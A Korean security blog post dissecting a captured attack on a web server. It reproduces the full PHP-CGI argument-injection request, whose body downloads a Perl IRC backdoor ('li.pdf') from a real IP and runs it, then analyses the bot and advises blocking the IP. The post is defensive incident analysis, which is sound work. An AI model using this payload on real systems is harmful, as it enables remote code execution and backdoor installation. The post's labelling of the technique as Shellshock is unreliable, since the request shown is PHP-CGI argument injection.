※ 아래 공개한 내용들은 학습과 사전차단을 통한 시스템 보호를 목적으로 하며, 부적절한 사용으로 인한 책임은 사용자 본인에게 있습니다.
또한 잘못된 내용이나, 추가 내용은 댓글을 통해 알려주시면 본문에 반영하도록 하겠습니다.
오늘은 매번 똑같은 공격패턴들만 보다가 나름 새로운 패턴을 보게됬습니다.
한 번의 공격에 여러 패턴을 이용하여 접근을 시도한 경우이고,
이런 경우 일부 보안 장비에서는 Multiple Signatures Attack로 탐지하기도 합니다.
우선 확인한 공격 당시의 HTTP 패킷 값입니다.
Post /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1
Host: ................
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Connection: close
<?php system("cd /tmp;lwp-download -a http://74.208.73.233/li.pdf;curl -O http://74.208.73.233/li.pdf;wget http://74.208.73.233/li.pdf; perl /tmp/li.pdf*;perl li.pdf;rm -rf /tmp/li.pdf*");=
cgi-bin취약점을 이용하여 보호기능 무력화를 시도하고 있으며, User-Agent를 봤을 때 아이패드를 사용하고 있다는 것을 추측할 수 있습니다.
물론 User-Agent야 얼마든지 수정 가능한 값이라고 하더라도요.
또 Post로 던진 Content값으로는 특정 서버에서 WebShell로 추정되는 pdf파일을 Bashshell Shock 취약점을 이용하여 다운로드 시도하고 있습니다.
Bashshell Shock 취약점을 이용하여 업로드 하려는 IP를 검색해보니 아래와 같습니다.
주소지는 미국에 있는 IP이고 해당 IP에 도메인이 걸려있습니다.
해당 도메인을 직접 접속하기엔 뭐가 있을지도 모르니 Malzilla라는 툴을 통해 접근해보겠습니다.
해당 도메인으로 접근시 검색했던 IP와 동일한 IP로 연결되는 것을 볼 수 있었고, 200 OK로 정상접근이 되지만, 빈 페이지인 것으로 보입니다.
아파치로 웹서버를 돌리고 있는 것을 볼 수 있는데 알려진 취약점이 있는 버전을 사용하고 있네요.
그리고 다음으로 역시 Malzilla를 통해 해당 서버에서 받아오는 li.pdf 파일을 살펴보겠습니다.
역시 파일 확장자만 pdf일 뿐이고 실제 내용은 Shell Script로 구성되어있습니다.
perl로 작성되어있고 이름마저 딱 써있네요. LinuxNet perlbot..
요즘 종종 보이는 bot인데 찾아보니 BLUECOAT에서 작년 9월에 Bashshell Shock 취약점을 이용하여 IRC Backdoor가 돌아다닌다고 적어뒀네요.
거기에 LinuxNet perlbot이 포함되어 있는걸 보니 공개된지는 얼마 안된건가 싶습니다.
virustotal에 해당 파일을 올려보니 이미 많은 백신에서 Backdoor, Shellbot으로 탐지를 하고 있었습니다
처음으로 파일이 업로드된게 2월 17일 00시경이었고 제가 탐지했던게 03시경이었으니 돌기 시작한지는 얼마 안된것 같습니다.
리눅스용이다보니 행위분석 등의 자세한 정보까지는 제공이 안 되네요.
대강 코드를 보면 IRC 서버와 클라이언트 설정을 하고 있으며, BLUECOAT에 적힌대로 IRC를 이용한 Backdoor인듯합니다.
모쪼록, 서버 관리자분들은 탐지장비가 있다면, Bashshell Shock에 해당하는 Signature 등록과 차단장비에 해당 파일을 다운로드 해오는 74.208.73.233 IP는 차단 설정을 하는 것이 좋겠습니다.
=========================================
<추가내용>
처음 해당 샘플을 접한건 2월 17일 03시 경이었으며, 추가로 확보한 샘플은 동일 서버(74.208.73.233)에서 md.org라는 파일명으로 배포되고 있습니다.
이 파일은 처음의 li.pdf파일과는 일부 설정값이 다르며, 이미 virustotal에 다양한 파일명으로 업로드가 된 것을 확인할 수 있습니다.
이 중 idex파일은 li.pdf파일을 배포하던 서버와 동일한 서버에도 존재하는 것으로 파악되었고, 따라서 현재 파악된 74.208.73.233 서버에 존재하는 IRC Backdoor로는 li.pdf, md.org, idex 파일입니다.
이 외에도 더 있을 수 있으나 동일 서버에서 다수의 악성파일이 유포되고 있는 상황이므로, 차단 장비를 통해 해당 IP를 차단하는 것이 바람직해보입니다.
